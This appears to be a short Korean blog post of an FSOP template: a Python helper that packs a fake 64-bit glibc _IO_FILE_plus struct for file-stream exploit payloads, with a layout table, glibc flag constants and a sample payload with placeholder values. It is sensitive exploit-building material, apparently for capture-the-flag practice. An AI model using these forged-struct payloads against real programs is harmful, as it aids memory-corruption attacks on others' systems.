매우 귀차니즘으로 인해.. FSOP 템플릿 구조를 업로드 해놓고 쓰려고 한다.
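def FSOP_struct(flags=0, _IO_read_ptr=0, _IO_read_end=0, _IO_read_base=0,
                _IO_write_base=0, _IO_write_ptr=0, _IO_write_end=0, _IO_buf_base=0, _IO_buf_end=0,
                _IO_save_base=0, _IO_backup_base=0, _IO_save_end=0, _markers=0, _chain=0, _fileno=0,
                _flags2=0, _old_offset=0, _cur_column=0, _vtable_offset=0, _shortbuf=0, lock=0,
                _offset=0, _codecvt=0, _wide_data=0, _freeres_list=0, _freeres_buf=0,
                __pad5=0, _mode=0, _unused2=b"", vtable=0, more_append=b""):
    """Serialize a fake 64-bit glibc ``struct _IO_FILE_plus`` for an FSOP payload.

    Each keyword argument is one struct member, written little-endian at its
    LP64 width: pointers and ``_old_offset``/``_offset``/``__pad5`` take 8
    bytes, ``_fileno``/``_flags2``/``_mode`` 4, ``_cur_column`` 2,
    ``_vtable_offset``/``_shortbuf`` 1.  Resulting offsets: ``_fileno`` 0x70,
    ``_old_offset`` 0x78, ``_lock`` 0x88, ``_mode`` 0xc0, ``_unused2`` 0xc4,
    ``vtable`` 0xd8, so ``len(result) == 0xe0 + len(more_append)``.

    Args:
        flags: ``_flags``; the full 8 bytes (the ``int`` plus its padding)
            are taken from this value.
        _unused2: raw bytes for the 0x14-byte ``_unused2`` area; shorter input
            is zero-padded, longer input is truncated.
        vtable: ``_IO_FILE_plus.vtable`` pointer, written at 0xd8.
        more_append: raw bytes appended verbatim after the vtable (for data
            that must sit directly behind the FILE, e.g. a fake vtable).
        (other parameters): integer member values in struct order.

    Returns:
        The packed struct as ``bytes``.

    Raises:
        ValueError: if an integer does not fit its field.  Signed members
            (``_fileno``, ``_old_offset``, ``_vtable_offset``, ``_offset``,
            ``_mode``, ...) may be given as negatives and are two's-complement
            encoded, so ``_fileno=-1`` yields ``ff ff ff ff``.
    """
    def pack(value, bits):
        # Accept both the unsigned and the signed range of the field, so a
        # signed member can be written as -1 without masking by hand.
        if not -(1 << (bits - 1)) <= value < (1 << bits):
            raise ValueError(f"value {value:#x} does not fit in {bits} bits")
        return (value & ((1 << bits) - 1)).to_bytes(bits // 8, "little")

    parts = [
        pack(flags, 64),                       # 0x00 _flags (int) + 4 bytes padding
        pack(_IO_read_ptr, 64),                # 0x08
        pack(_IO_read_end, 64),                # 0x10
        pack(_IO_read_base, 64),               # 0x18
        pack(_IO_write_base, 64),              # 0x20
        pack(_IO_write_ptr, 64),               # 0x28
        pack(_IO_write_end, 64),               # 0x30
        pack(_IO_buf_base, 64),                # 0x38
        pack(_IO_buf_end, 64),                 # 0x40
        pack(_IO_save_base, 64),               # 0x48
        pack(_IO_backup_base, 64),             # 0x50
        pack(_IO_save_end, 64),                # 0x58
        pack(_markers, 64),                    # 0x60
        pack(_chain, 64),                      # 0x68
        pack(_fileno, 32),                     # 0x70
        pack(_flags2, 32),                     # 0x74
        pack(_old_offset, 64),                 # 0x78
        pack(_cur_column, 16),                 # 0x80
        pack(_vtable_offset, 8),               # 0x82 (signed char)
        pack(_shortbuf, 8),                    # 0x83 (char[1])
        b"\x00" * 4,                           # 0x84 alignment padding before _lock
        pack(lock, 64),                        # 0x88 _lock
        pack(_offset, 64),                     # 0x90
        pack(_codecvt, 64),                    # 0x98
        pack(_wide_data, 64),                  # 0xa0
        pack(_freeres_list, 64),               # 0xa8
        pack(_freeres_buf, 64),                # 0xb0
        pack(__pad5, 64),                      # 0xb8
        pack(_mode, 32),                       # 0xc0
        _unused2[:0x14].ljust(0x14, b"\x00"),  # 0xc4, exactly 0x14 bytes
        pack(vtable, 64),                      # 0xd8 _IO_FILE_plus.vtable
        more_append,                           # 0xe0 onward, caller-supplied
    ]
    return b"".join(parts)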
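# All-zero baseline instance (0xe0 bytes, vtable slot at 0xd8).
FSOP = FSOP_struct()

# The same bytes the field-by-field version of this payload produced, now
# built through the template so the two cannot drift apart. 64-bit _IO_FILE
# layout the call fills, 16 bytes per row as gdb prints it:
#   0x00 _flags(4)+pad(4)       0x08 _IO_read_ptr
#   0x10 _IO_read_end           0x18 _IO_read_base
#   0x20 _IO_write_base         0x28 _IO_write_ptr
#   0x30 _IO_write_end          0x38 _IO_buf_base
#   0x40 _IO_buf_end            0x48 _IO_save_base
#   0x50 _IO_backup_base        0x58 _IO_save_end
#   0x60 _markers               0x68 _chain
#   0x70 _fileno(4)+_flags2(4)  0x78 _old_offset
#   0x80 _cur_column(2)+_vtable_offset(1)+_shortbuf(1)+pad(4)  0x88 _lock
#   0x90 _offset                0x98 _codecvt
#   0xa0 _wide_data             0xa8 _freeres_list
#   0xb0 _freeres_buf           0xb8 __pad5
#   0xc0 _mode(4)+_unused2(20)  0xd8 vtable
# NOTE(review): 0xfbad is the upper half of _IO_MAGIC (0xFBAD0000, see the
# flag list below). Used directly as _flags it sets the low-order bits
# (_IO_USER_BUF, _IO_NO_READS, _IO_NO_WRITES, _IO_LINE_BUF, ...) rather than
# the magic; confirm whether 0xfbad0000 | <flag bits> was intended.
payload = FSOP_struct(
    flags=0xfbad,   # _flags
    _fileno=1,      # fd 1
    vtable=1111,    # presumably a placeholder for the chosen vtable address
)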
#64-bit _IO_FILE_plus layout, 16 bytes per row as gdb prints it (offsets 0x00..0xdf, vtable at 0xd8)
#flags(4)+pad(4) IO_read_ptr(8)
#IO_read_end(8) IO_read_base(8)
#IO_write_base(8) IO_write_ptr(8)
#IO_write_end(8) IO_buf_base(8)
#IO_buf_end(8) IO_save_base(8)
#IO_backup_base(8) IO_save_end(8)
#_markers(8) _chain(8)
#_fileno(4)+_flags2(4) _old_offset(8)
#_cur_column(2)+_vtable_offset(1)+_shortbuf(1)+pad(4) lock(8)
#_offset(8) _codecvt(8)
#_wide_data(8) _freeres_list(8)
#_freeres_buf(8) __pad5(8)
#_mode(4)+unused2(4) unused2(8)
#unused2(8) vtable(8)
#define _IO_MAGIC 0xFBAD0000 /* Magic number */
#define _IO_MAGIC_MASK 0xFFFF0000
#define _IO_USER_BUF 0x0001 /* Don't deallocate buffer on close. */
#define _IO_UNBUFFERED 0x0002
#define _IO_NO_READS 0x0004 /* Reading not allowed. */
#define _IO_NO_WRITES 0x0008 /* Writing not allowed. */
#define _IO_EOF_SEEN 0x0010
#define _IO_ERR_SEEN 0x0020
#define _IO_DELETE_DONT_CLOSE 0x0040 /* Don't call close(_fileno) on close. */
#define _IO_LINKED 0x0080 /* In the list of all open files. */
#define _IO_IN_BACKUP 0x0100
#define _IO_LINE_BUF 0x0200
#define _IO_TIED_PUT_GET 0x0400 /* Put and get pointer move in unison. */
#define _IO_CURRENTLY_PUTTING 0x0800
#define _IO_IS_APPENDING 0x1000
#define _IO_IS_FILEBUF 0x2000
/* 0x4000 No longer used, reserved for compat. */
#define _IO_USER_LOCK 0x8000